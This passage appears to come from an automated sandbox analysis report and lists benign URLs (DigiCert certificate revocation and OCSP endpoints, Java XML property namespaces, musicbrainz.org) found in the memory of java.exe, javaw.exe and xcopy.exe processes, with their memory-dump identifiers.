Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryes/i:
00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: java.exe, 00000002.00000002.1638031502.000000000A40A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000554C000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/dtd/properties.dtd
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkrce
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSourceX
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespacex
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd/No
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/3
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://musicbrainz.org
Source: javaw.exe, 00000006.00000002.2853953769.0000000015570000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A104000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000544E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852184942.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723167720.0000000015C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009F78000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A579000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
